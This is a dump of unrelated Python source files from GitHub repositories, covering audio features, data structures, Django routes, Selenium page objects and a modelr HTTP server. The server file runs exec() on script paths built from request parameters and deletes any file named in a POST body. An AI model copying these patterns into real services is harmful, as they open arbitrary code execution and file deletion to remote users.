writer.writerow(h)\n for directory, _, filenames in os.walk(\"./data/Sounds-dataset/\"):\n for filename in filenames:\n row = [directory]\n row.append(filename)\n y, sr = librosa.load(os.path.join(directory, filename), mono=True)\n row.extend(get_features(y, sr))\n writer.writerow(row)\n\n\n#execute once to create dataset\ndef feature_table_to_dataset(dataset_file_name, table_file_name):\n with open(dataset_file_name, 'w', encoding='cp1251', newline ='') as file:\n writer = csv.writer(file, delimiter=',')\n h = get_headers()\n h.append(\"label\")\n writer.writerow(h)\n features = pd.read_csv(table_file_name, encoding='cp1251')\n for f1 in features.values:\n for f2 in features.values:\n dir1, dir2 = f1[0], f2[0]\n fname1, fname2 = f1[1], f2[1]\n row = []\n row.extend([fname1, fname2])\n row.extend(f1[2:])\n row.extend(f2[2:])\n label = round(100 - mean_absolute_percentage_error(f1[2:], f2[2:]))\n row.append(label)\n writer.writerow(row)","repo_name":"DanielTkachenko/SoundRecognition","sub_path":"my_dataset.py","file_name":"my_dataset.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33409562176","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef split_in_groups(items, n):\n try:\n n = int(n)\n except (ValueError, TypeError):\n return [items]\n\n groups = []\n\n while len(items) != 0:\n next_group = items[:n]\n groups.append(next_group)\n\n items = items[n:]\n\n return groups\n","repo_name":"rizplate/Loki","sub_path":"loki/base_app/templatetags/list_utils.py","file_name":"list_utils.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23942992253","text":"import random\nimport copy\n\nclass BinomialQueue:\n\n\tclass Node:\n\t\tdef __init__(self, data):\n\t\t\tself.data = data\n\t\t\tself.children = []\n\n\tclass BinomialTree:\n\t\tdef __init__(self, root, k, has_priortiy):\n\t\t\tself.root = root\n\t\t\tself.k = k\n\t\t\tself.has_priortiy = has_priortiy\n\n\t\tdef merge(self, other):\n\t\t\tif (self.k != other.k or not self.root or not other.root):\n\t\t\t\traise Exception(\"Error merging binomial trees because of None roots or height differences\")\n\n\t\t\tif (self.has_priortiy(self.root.data, other.root.data)):\n\t\t\t\tself.root.children.append(other.root)\n\t\t\telse:\n\t\t\t\tother_cpy = copy.copy(other)\n\t\t\t\tother_cpy.root.children.append(self.root)\n\t\t\t\tself.root = other_cpy.root\n\t\t\tself.k += 1\n\n\t\tdef get_top(self):\n\t\t\tif (not self.root):\n\t\t\t\traise Exception(\"cannot get top of empty tree\")\n\t\t\treturn self.root.data\n\n\t\tdef __repr__(self):\n\t\t\tif (not self.root):\n\t\t\t\treturn \"[]\"\n\n\t\t\tq = [self.root]\n\n\t\t\tres = \"[\"\n\n\t\t\twhile (q):\n\t\t\t\tx = q.pop(0)\n\t\t\t\tif (not x):\n\t\t\t\t\tres += \"None, \"\n\n\t\t\t\telse:\n\t\t\t\t\tres += \"{}, \".format(str(x.data))\n\t\t\t\t\tif (len(x.children) > 0):\n\t\t\t\t\t\tfor child in x.children:\n\t\t\t\t\t\t\tq.append(child)\n\n\t\t\tres = res[:-2] + \"]\"\n\t\t\treturn res\n\n\n\n\n\tdef __init__(self, has_priortiy=None, lone_tree=None):\n\t\tself.size = 0\n\t\tif (not lone_tree):\n\t\t\tself.queue = [] # sorted list (by height) of binomial trees\n\t\telse:\n\t\t\tself.queue = [lone_tree]\n\t\t\tself.size += pow(2,lone_tree.k)\n\t\tself.has_priortiy = has_priortiy\n\t\tself.hash = {}\n\n\tdef set_queue(self, q):\n\t\tself.queue = q\n\n\tdef contains(self, data):\n\t\treturn data in self.hash\n\n\tdef insert(self, data):\n\t\tif (data in self.hash):\n\t\t\traise Exception(\"cannot insert {} because it already exists\".format(data))\n\n\t\tself.hash[data] = True\n\t\tone_node_queue = BinomialQueue(lone_tree=self.BinomialTree(self.Node(data), 0, self.has_priortiy))\n\t\tself.merge(one_node_queue)\n\t\tself.size += 1\n\n\n\tdef is_valid_queue(self):\n\t\t# make sure the queue is in sorted order\n\t\tfor i in range(0, len(self.queue) - 1):\n\t\t\tif (self.queue[i].k > self.queue[i+1].k):\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef remove_min(self):\n\t\t\n\t\tdef smallest_idx():\n\t\t\tif (len(self.queue) == 0):\n\t\t\t\traise Exception(\"Cannot get smallest idx from empty queue\")\n\t\t\t\"\"\"\n\t\t\tget the index in the queue containing the smallest element\n\t\t\t\"min\" assuming small elements have priority\n\t\t\t\"\"\"\n\t\t\tmin_val = self.queue[0].get_top()\n\t\t\tmin_idx = 0\n\t\t\tfor i in range(1, len(self.queue)):\n\t\t\t\tif (self.has_priortiy(self.queue[i].get_top(), min_val)):\n\t\t\t\t\tmin_val = self.queue[i].get_top()\n\t\t\t\t\tmin_idx = i\n\n\t\t\treturn min_idx\n\n\t\tdef get_children(tree):\n\t\t\t\"\"\"\n\t\t\tget all the children of this tree\n\t\t\t(they should be in sorted order)\n\t\t\t\"\"\"\n\t\t\tqueue_children = []\n\t\t\troots_children = tree.root.children\n\t\t\tfor i in range(len(roots_children)):\n\t\t\t\tqueue_children.append(self.BinomialTree(roots_children[i], i, self.has_priortiy))\n\t\t\treturn queue_children\n\n\t\tif (len(self.queue) == 0):\n\t\t\traise Exception(\"cannot remove min on empty queue\")\n\n\t\tmin_idx = smallest_idx()\n\t\tpopped_tree = self.queue.pop(min_idx) # remove the tree\n\t\tval = popped_tree.get_top()\n\t\tself.hash.pop(val) # remove from hash\n\t\tto_merge = BinomialQueue(has_priortiy=self.has_priortiy)\n\t\tto_merge.set_queue(get_children(popped_tree)) # add popped's node's children\n\t\tself.merge(to_merge)\n\t\tself.size -= 1\n\t\treturn val\n\n\tdef merge(self, other):\n\t\tq3 = [] # the merged queue\n\t\tq1 = self.queue\n\t\tq2 = other.queue\n\n\t\tdef helper(idx1, idx2):\n\t\t\tnonlocal q1, q2, q3\n\n\t\t\t# potentially merge with q3[-1]\n\t\t\tdef merge_tree(tree):\n\t\t\t\tnonlocal q3\n\t\t\t\tif (q3 != [] and q3[-1].k == tree.k):\n\t\t\t\t\ttree.merge(q3.pop(-1))\n\t\t\t\tq3.append(tree)\n\n\n\t\t\t# mo more trees to merge\n\t\t\tif (idx1 >= len(q1) and idx2 >= len(q2)):\n\t\t\t\treturn\n\n\t\t\t# trees left in q1\n\t\t\telif (idx2 >= len(q2)):\n\t\t\t\tmerge_tree(q1[idx1])\n\t\t\t\tidx1 += 1\n\n\t\t\t# trees left in q2\n\t\t\telif (idx1 >= len(q1)):\n\t\t\t\tmerge_tree(q2[idx2])\n\t\t\t\tidx2 += 1\n\n\t\t\t# trees left in both\n\t\t\telse:\n\t\t\t\t# if the trees have the same height, merge them together\n\t\t\t\tif (q1[idx1].k == q2[idx2].k):\n\t\t\t\t\tq1[idx1].merge(q2[idx2])\n\t\t\t\t\tq3.append(q1[idx1])\n\t\t\t\t\tidx1 += 1\n\t\t\t\t\tidx2 += 1\n\t\t\t\telse:\n\t\t\t\t\tif (q1[idx1].k < q2[idx2].k):\n\t\t\t\t\t\tsmall_tree = q1[idx1]\n\t\t\t\t\t\tidx1 += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tsmall_tree = q2[idx2]\n\t\t\t\t\t\tidx2 += 1\n\n\t\t\t\t\tmerge_tree(small_tree)\n\n\t\t\thelper(idx1, idx2)\n\n\t\thelper(0, 0)\n\t\tself.queue = q3\n\n\n\tdef __len__(self):\n\t\treturn self.size\n\n\t\"\"\"\n\tprint the level order traversal of each of the binomial trees\n\t\"\"\"\n\tdef __repr__(self):\n\t\tres = \"\"\n\t\tfor tree in self.queue:\n\t\t\tres += tree.__repr__()\n\t\t\tres += \"\\n\"\n\t\treturn res\n\n\nif __name__ == \"__main__\":\n\tpriority = lambda x, y: x < y\n\tbq = BinomialQueue(priority)\n\n\n\tnums = list(range(0, 10000))\n\tfor i in range(1000):\n\t\tnum = nums.pop(random.randint(0, len(nums) - 1))\n\t\tbq.insert(num)\n\t\tprint(\"inserted {}\".format(num))\n\n\tprint(bq)\n\tprint(len(bq.queue))\n\n\t# while (len(bq) > 0):\n\t# \tval = bq.remove_min()\n\t# \tprint(\"Removed {}\".format(val))\n\n\n\n\n\n\n\n","repo_name":"ovifrisch/Python-Data-Structures","sub_path":"heaps/binomial_queue.py","file_name":"binomial_queue.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28269623224","text":"from django.urls import path, include\n\nfrom . import views\n\nfrom django.contrib.auth import views as auth_views\n\napp_name = 'moticom'\nurlpatterns = [\n path('', views.TopView, name='main'),\n #path('', views.TopView.as_view(), name='main'),\n path('index', views.IndexView.as_view(), name='index'),\n path('board', views.BoardView.as_view(), name='board'),\n path('genre_display', views.genre_display, name='genre_display'),\n path('report', views.ReportView.as_view(), name='report'),\n path('genre', views.GenreView.as_view(), name='genre'),\n path('complete', views.create_post, name='complete'),\n path('profile', views.ProfileView.as_view(), name='profile'),\n path('complaints', views.ComplaintsView.as_view(), name='complaints'),\n path('help', views.HelpView.as_view(), name='help'),\n path('accounts/', include('django.contrib.auth.urls')),\n #path('accounts/password_change/', auth_views.PasswordChangeView.as_view(template_name='registration/password_change.html'), name='password_change_form'), # 追加\n #path('accounts/password_change/done', auth_views.PasswordChangeDoneView.as_view(template_name='registration/password_change_finish.html'), name='password_change_done'), \n \n #管理者用ページ↓\n path('admin', views.AdminView, name='admin'),\n path('analysis', views.AnalysisView.as_view(), name='analysis'),\n path('admin_board', views.Admin_BoardView, name='admin_board'),\n path('admin_genre_display', views.admin_genre_display, name='admin_genre_display'),\n path('delete_post', views.DeletePost, name='delete_post'),\n path('delete_comment', views.DeleteComment, name='delete_comment'),\n path('user', views.UserView.as_view(), name='user'),\n path('layout', views.LayoutView.as_view(), name='layout'),\n path('genre_manage', views.Genre_ManageView.as_view(), name='genre_manage'),\n path('add_genre', views.create_genre, name='add_genre'),\n path('delete_genre', views.delete_genre, name='delete_genre'),\n path('filter', views.FilterView.as_view(), name='filter'),\n path('delete_NGword', views.delete_NGword, name='delete_NGword'),\n path('sorting', views.sorting, name='sorting'),\n path('linking', views.LinkingView.as_view(), name='linking'),\n path('switch_link', views.Switch_link, name='switch_link'),\n path('DeleteKeyWord', views.DeleteKeyWord, name='DeleteKeyWord'),\n path('cm_create', views.Cm_CreateView.as_view(), name='cm_create'),\n path('create', views.CreativeControlMeasureView.as_view(), name='create'),#正しいところに移ったらcm_createに修正\n path('/update', views.UpdateControlMeasureView.as_view(), name='update'), #正しいところに移ったらcm_updateに修正\n path('/delete', views.DeleteControlMeasureView.as_view(), name='delete'), #正しいところに移ったらcm_deleteに修正\n path('sorting', views.sorting, name='sorting'),\n path('linking', views.LinkingView.as_view(), name='linking'),\n path('search', views.Search, name='search'),\n path('signup', views.SignUp.as_view(), name='signup'),\n path('signup/finish', views.SignUpFinish.as_view(), name='signup_finish'),\n ]\n\n\"\"\"\n変更点\n・コメントアウトされているものを下に移動\n\"\"\"\n\n\"\"\"\n #path('save_report', views.save_report, name='save_report'),\n #path('sorting', views.SortingView.as_view(), name='sorting'),\n #path('login/', views.Login, name='login'),\n #path('logout', views.Logout.as_view(), name='logout'),\n #path('password_change', views.PasswordChange.as_view(), name='password_change'), #パスワード変更\n #path('password_change/done', views.PasswordChangeDone.as_view(), name='password_change_done'), #パスワード完了\n #path('password_change/', views.PasswordChange.as_view(), name='password_change'),\n #path('password_change/done/', views.PasswordChangeDone.as_view(), name='password_change_done'),\n #path('change_password/', auth_views.PasswordChangeView.as_view(template_name='moticom/password_change.html', success_url = '/'),name='password_change'),\n #path('password_change_form', auth_views.PasswordChangeView.as_view(template_name='registration/password_change_form.html'), name='password_change_form'), # 追加\n #path('password_change_done', auth_views.PasswordChangeDoneView.as_view(template_name='registration/password_change_done.html'), name='password_change_done'), # 追加\n \n\"\"\"","repo_name":"Ksxr/2021PBL","sub_path":"mysite/moticom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40280930523","text":"from jinja2 import Environment, PackageLoader\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom argparse import ArgumentParser\nfrom os import listdir\nfrom os.path import isfile, join, dirname\n\nimport os\n\nfrom urllib.parse import urlparse, parse_qs\nfrom modelr.web.urlargparse import SendHelp, ArgumentError, \\\n URLArgumentParser\nimport traceback\nimport json\nimport multiprocessing as mp\nimport ssl\nimport socket\nfrom socketserver import ThreadingMixIn\n\nfrom modelr.EarthModel import EarthModel\nfrom modelr.SeismicModel import SeismicModel\nfrom modelr.ModelrPlot import ModelrPlot\nfrom modelr.ForwardModel import ForwardModel\nfrom modelr.ModelrScript import ModelrScript\n\nimport base64\n\n# import cProfile as prof\n\n# -*- coding: utf-8 -*-\n'''\n===================\nmodelr.web.server\n===================\n\nMain program to start a web server.\n\nCreated on Apr 30, 2012\n\n@author: sean\n'''\n\nsocket.setdefaulttimeout(6)\n\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n \"\"\" This class allows to handle requests in separated threads.\n No further content needed, don't touch this. \"\"\"\n\n\nclass MyHandler(BaseHTTPRequestHandler):\n '''\n Handles a single request.\n '''\n\n def terminate(self):\n '''\n shut down the application\n '''\n # \"terminate requested\"\n\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n self.wfile.write(\"Shutting down...\".encode())\n\n self.server._BaseServer__shutdown_request = True\n\n def eval_script(self, script, script_type):\n '''\n Get the the namespace for a script.\n '''\n # If no script was passed, then tell the user\n if not script or len(script) != 1:\n # \"++++++++++++++++++++++++++++++++++++\"\n self.send_script_error(\"argument 'script' was omitted \" +\n \"or malformed (got %r)\" % (script))\n return\n\n if script_type is None:\n # \"++++++++++++++++++++++++++++++++++++\"\n self.send_script_error(\"argument 'script_type' was omitted \"\n \"or malformed (got %r)\" % (script))\n return\n\n # Otherwise, run the script\n dirn = dirname(__file__)\n script_path = join(dirn, 'scripts', script_type[0], script[0])\n\n if not isfile(script_path):\n self.send_script_error(\"argument 'script' '%r' was is not a \"\n \"valid script \" % (script[0],))\n return\n\n namespace = {}\n with open(script_path, 'r') as fd:\n exec(fd.read(), namespace)\n\n return namespace\n\n def do_OPTIONS(self):\n self.send_response(200)\n self.send_header('Allow', 'GET, OPTIONS')\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-Length', '0')\n self.end_headers()\n\n def do_GET(self):\n '''\n handle a get request.\n '''\n # \"my do GET\"\n try:\n uri = urlparse(self.path)\n parameters = parse_qs(uri.query)\n\n # super dangerous. commenting out\n # if uri.path == '/terminate':\n # self.terminate()\n # return\n\n # returns the script help\n if uri.path == '/script_help.json':\n\n script = parameters.pop('script', None)\n script_type = parameters.pop('type', None)\n\n namespace = self.eval_script(script, script_type)\n if namespace is None:\n self.send_response(400)\n self.end_headers()\n\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n script_main = namespace['run_script']\n add_arguments = namespace['add_arguments']\n short_description = namespace.get('short_description',\n 'No description')\n\n parser = URLArgumentParser(short_description)\n add_arguments(parser)\n\n self.wfile.write(parser.json_data)\n\n return\n\n # list the available scripts\n if uri.path == '/available_scripts.json':\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n script_type = parameters.pop('type', None)\n\n all_scripts = self.get_available_scripts(script_type)\n\n data = json.dumps(all_scripts)\n\n self.wfile.write(data.encode())\n return\n\n # Outputs a base64 image and an auxillary json structure\n elif uri.path == '/plot.json':\n\n parameters = parse_qs(uri.query)\n script = parameters.pop(\"script\", None)\n script_type = parameters.pop(\"type\", None)\n\n # Get the namespace\n namespace = self.eval_script(script, script_type)\n if namespace is None:\n return\n\n plot_generator = ModelrScript(parameters, namespace)\n\n # Run in sub-process to prevent memory hogging\n # p = mp.Process(target=self.run_script_jpg_json,\n # args=(plot_generator,))\n # p.start()\n # p.join()\n self.run_script_jpg_json(plot_generator)\n\n # Outputs json data\n elif uri.path == '/data.json':\n parameters = parse_qs(uri.query)\n script = parameters.pop(\"script\", None)\n script_type = parameters.pop(\"type\", None)\n\n print(\"running\", script, script_type)\n payload = json.loads(parameters.pop(\"payload\")[0])\n\n # Get the namespace\n namespace = self.eval_script(script, script_type)\n if namespace is None:\n return\n\n # payload = json.parse(parameters[\"payload\"])\n script_main = namespace[\"run_script\"]\n\n # Run in sub-process to prevent memory hogging\n # p = mp.Process(target=self.run_script_json,\n # args=(script_main, payload))\n # p.start()\n # p.join()\n self.run_script_json(script_main, payload)\n\n # Output only an image\n elif uri.path == '/plot.jpeg':\n script = parameters.pop('script', None)\n script_type = parameters.pop('type', None)\n namespace = self.eval_script(script, script_type)\n if namespace is None:\n return\n\n script_main = namespace['run_script']\n add_arguments = namespace['add_arguments']\n short_description = namespace.get('short_description',\n 'No description')\n # \"parameters\", parameters\n # p = mp.Process(target=self.run_script_jpg,\n # args=(script[0], script_main,\n # add_arguments, short_description,\n # parameters))\n # p.start()\n # p.join()\n self.run_script_jpg(script[0], script_main,\n add_arguments, short_description,\n parameters)\n\n else:\n self.send_error(404, 'File Not Found: %s' % self.path)\n return\n\n except Exception:\n self.send_response(400)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n tb = traceback.format_exc().splitlines()\n\n tb = '
\\n'.join(tb)\n\n self.wfile.write('Python Error
'.encode())\n self.wfile.write('
'.encode())\n self.wfile.write(tb.encode())\n self.wfile.write('
'.encode())\n raise\n\n def run_script_jpg(self, script, script_main, add_arguments,\n short_description, parameters):\n '''\n Run a script that returns a jpeg\n\n :param script_main: the main method of the script\n :param add_arguments: poplate an argument parser\n :param short_description: a short description of the script\n :param parameters: the parameters from the get request\n '''\n parser = URLArgumentParser(short_description)\n add_arguments(parser)\n try:\n args = parser.parse_params(parameters)\n except SendHelp:\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n template = self.server.jenv.get_template('ScriptHelp.html')\n\n # parameters\n html = template.render(script=script, parser=parser,\n parameters=parameters)\n self.wfile.write(html.encode())\n return\n except ArgumentError as err:\n self.send_response(400)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n self.wfile.write(('

Error: %s

'\n % (err.args[0],)).encode())\n self.wfile.write(parser.help_html.encode())\n return\n\n jpeg_data = script_main(args)[0]\n\n self.send_response(200)\n self.send_header('Content-type', 'image/png')\n self.end_headers()\n\n self.wfile.write(jpeg_data)\n\n del jpeg_data\n\n def run_script_json(self, script, payload):\n\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n data = script(payload)\n\n # Write response\n self.wfile.write(json.dumps(data).encode())\n\n def run_script_jpg_json(self, plot_generator):\n \"\"\"\n Runs a script and writes out a JSON response with\n a base64 encoded jpeg and json metadata\n \"\"\"\n\n # Run the script\n image_data, metadata = plot_generator.go()\n\n # Encode for http send\n encoded_image = base64.b64encode(image_data)\n\n # convert to json\n data = json.dumps({'data': encoded_image,\n 'metadata': metadata})\n\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Headers',\n 'X-Request, X-Requested-With')\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n # Write response\n self.wfile.write(data.encode())\n\n def get_available_scripts(self, script_type=None):\n '''\n Returns a list of all the scripts in the scripts directory.\n '''\n\n if script_type is None:\n # \"++++++++++++++++++++++++++++++++++++\"\n return\n\n scripts_dir = join(dirname(__file__), 'scripts',\n script_type[0])\n\n available_scripts = []\n for script in listdir(scripts_dir):\n try:\n if script == '__init__.py':\n continue\n elif not script.endswith('.py'):\n continue\n\n namespace = {}\n with open(join(scripts_dir, script), 'r') as fd:\n exec(fd.read(), namespace)\n\n\n short_doc = namespace.get('short_description',\n 'No doc')\n # script, namespace\n available_scripts.append((script, short_doc))\n except Exception as e:\n print(script, e)\n\n return available_scripts\n\n def send_script_error(self, msg):\n '''\n Send an error related to the script.\n '''\n\n template = self.server.jenv.get_template('ScriptError.html')\n\n self.send_response(400)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n scripts = self.get_available_scripts(['scenario'])\n html = template.render(msg=msg, available_scripts=scripts)\n self.wfile.write(html.encode())\n\n def do_POST(self):\n \"\"\"\n Calls that access datafiles\n \"\"\"\n uri = urlparse(self.path)\n\n if uri.path == '/forward_model.json':\n\n content_len = int(self.headers.getheader('content-length'))\n raw_json = self.rfile.read(content_len)\n\n parameters = json.loads(raw_json)\n\n earth_script = parameters[\"earth_model\"].pop(\"script\",\n None)\n earth_namespace = self.eval_script([earth_script],\n ['earth'])\n\n earth_model = EarthModel(parameters[\"earth_model\"],\n earth_namespace)\n\n seismic_script = parameters[\"seismic_model\"].pop(\"script\",\n None)\n\n seismic_namespace = self.eval_script([seismic_script],\n ['seismic'])\n\n seismic_model = SeismicModel(parameters[\"seismic_model\"][\"args\"],\n seismic_namespace)\n\n plot_script = parameters[\"plots\"].pop(\"script\", None)\n plot_namespace = self.eval_script([plot_script],\n ['plots'])\n\n plots = ModelrPlot(parameters[\"plots\"][\"args\"],\n plot_namespace)\n\n forward_model = ForwardModel(earth_model, seismic_model,\n plots)\n\n # prof.runctx('self.run_json(forward_model)',\n # {'self': self, 'forward_model':forward_model},\n # {},\n # 'profile.test')\n\n # p = mp.Process(target=self.run_script_jpg_json,\n # args=(forward_model,))\n\n # p.start()\n # p.join()\n self.run_script_jpg_json(forward_model)\n\n return\n\n elif (uri.path == '/delete_model'):\n\n self.send_response(200)\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.end_headers()\n\n content_len = int(self.headers.getheader('content-length'))\n raw_json = self.rfile.read(content_len)\n\n parameters = json.loads(raw_json)\n os.remove(str(parameters[\"filename\"]))\n\n return\n\n self.send_error(404, 'Post request not supportd yet: %s'\n % self.path)\n\n# Locations of the PEM files for SSL\n# If this doesn't work, an alternative would be to store the\n# full chain including the private key, as described here:\n# http://www.digicert.com/ssl-support/pem-ssl-creation.htm\n# CERTFILE = '/etc/ssl/modelr/public.pem'\n# KEYFILE = '/etc/ssl/private/private.pem'\nCERTFILE = 'cert.pem'\nKEYFILE = 'key.pem'\n\n\ndef main():\n '''\n Main method starts a server and exits on\n '''\n parser = ArgumentParser(description=__doc__)\n\n parser.add_argument('--host', type=str, default='')\n parser.add_argument('-p', '--port', type=int, default=80)\n\n parser.add_argument('--local', type=bool, default=False)\n args = parser.parse_args()\n try:\n # This provides SSL, serving over HTTPS.\n # This approach will not allow service over HTTP.\n # I think we should allow both, since there is no\n # real reason for modelr-server to be secure.\n # I don't know if we need to check the certificate\n # on the client side too, or if doing it this way\n # will satisfy the browser and that's enough.\n\n if not args.local:\n server = ThreadedHTTPServer((args.host, args.port), MyHandler)\n\n # Force TLS v1.2. Not important per se, but the\n # main point is to disallow SSL v3, which is insecure.\n # I think we're supposed to load certs to the context,\n # but if this doesn't work we can put that bit back\n # in the socket wrapping part.\n context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n context.load_cert_chain(certfile=CERTFILE, keyfile=KEYFILE)\n\n server.socket = context.wrap_socket(server.socket,\n server_side=True)\n server.socket.settimeout(0.0)\n\n else:\n server = HTTPServer((args.host, args.port), MyHandler)\n\n server.jenv = Environment(loader=PackageLoader('modelr',\n 'web/templates'))\n\n print('started httpserver...')\n server.serve_forever()\n\n except KeyboardInterrupt:\n print('^C received, shutting down server')\n server.socket.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"agilescientific/modelr","sub_path":"modelr/web/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":17789,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"22952117179","text":"def length_of_longest_substring(string: str) -> int:\n if not string:\n return 0 # if the length of the string is 0, return 0 as there are no substrings\n\n # set longest substring to 1 as default value for now\n longest_substring = 1\n # set window start and end to the start of the string\n window_start, window_end = 0, 0\n\n # slowly increase the end of the window until it has reached the length of the string\n # once it is the length of the string\n while window_end < len(string):\n # create a substring using list slicing which is the size of the window\n substring = string[window_start : window_end + 1]\n # check that the substring has no duplicate characters\n if len(set(list(substring))) == len(substring):\n # set longest_substring to current length if it is higher than the previous longest substring\n longest_substring = max(longest_substring, window_end - window_start + 1)\n # increase the window length by one to test if that substring will contain duplicates\n window_end += 1\n continue\n # increase the start of the window by one\n window_start += 1\n return longest_substring\n","repo_name":"Code-Club-OSC/solutions-and-examples","sub_path":"term_3/longest_substr.py","file_name":"longest_substr.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6037959517","text":"import time\n\ndef t_time():\n start_time = time.time()\n time.sleep(0.1)\n return (time.time() - start_time)\n\ndef clock():\n start_clock = time.clock()\n time.sleep(0.1)\n return (time.clock() - start_clock)\n\ncount_time = 0\ncount_clock = 0\n\nfor i in range(1,10):\n count_time += t_time()\n count_clock += clock()\n\nprint(\"time =\",count_time)\nprint(\"clock =\",count_clock)","repo_name":"ViktoricaN/New","sub_path":"Time.py","file_name":"Time.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14106036034","text":"class Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n dic = {}\n total = 0\n ans = 0\n for ele in nums:\n total += ele\n if total == k: ans += 1\n if total - k in dic:\n ans += dic.get(total - k)\n if total in dic:\n dic[total] = dic.get(total) + 1\n else:\n dic[total] = 1\n return ans","repo_name":"Sol-cito/LeetCoding","sub_path":"560-subarray-sum-equals-k/560-subarray-sum-equals-k.py","file_name":"560-subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34453112712","text":"from BasePage import BasePage\nfrom BasePage import IncorrectPageException\nfrom oig.Constants import TT_Constants\nfrom oig.UIMap import OrientationWhistleblowerPageMap\n\n\n#this is a page object for the New Hire Orientation - Whistleblower Protection info page\n#accessed after clicking the Whistleblower Protection link \nclass OrientationWhistleblowerPage(BasePage):\n\n def __init__(self, driver):\n super(OrientationWhistleblowerPage, self).__init__(driver)\n \n def _verify_page(self):\n try:\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationWhistleblowerBannerXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationWelcomeLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationBeforeReportLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationFirstDayLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationNoFearLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationPayLeaveLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationBenefitsLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationWorkersCompLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationEthicsLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationWhistleblowerLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationHrConnectLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationForgottenLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationConstitutionLinkXpath']\n )\n self.wait_for_element_visibility(10, \n \"xpath\", \n OrientationWhistleblowerPageMap['OrientationAbbreviationsLinkXpath']\n )\n except: \n raise IncorrectPageException\n \n \n \n ","repo_name":"vleung1/portfolio","sub_path":"Vincent_Leung_Portfolio_2016/test-automation/oig/pages/OrientationWhistleblowerPage.py","file_name":"OrientationWhistleblowerPage.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6497048366","text":"import AutoNumberBaseball\nimport AutoNumberBaseballVer1\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\nimport pandas as pd\nimport numpy as np\n\n\n# 프로그램을 시작, 종료하는 funciton이 존재해야 함. 종료 function에는 모든 초기값들이 초기화되어야 한다. 시작 function은 컴퓨터의 시도 횟수와 guess 추이를 반환해야 한다.\ndef auto_execute(start_func, end_func, repeat):\n list_of_guess_log = []\n\n list_of_attempts = []\n for i in range(repeat):\n attempts, guess_log = start_func()\n list_of_attempts.append(attempts)\n while len(guess_log) != 14:\n 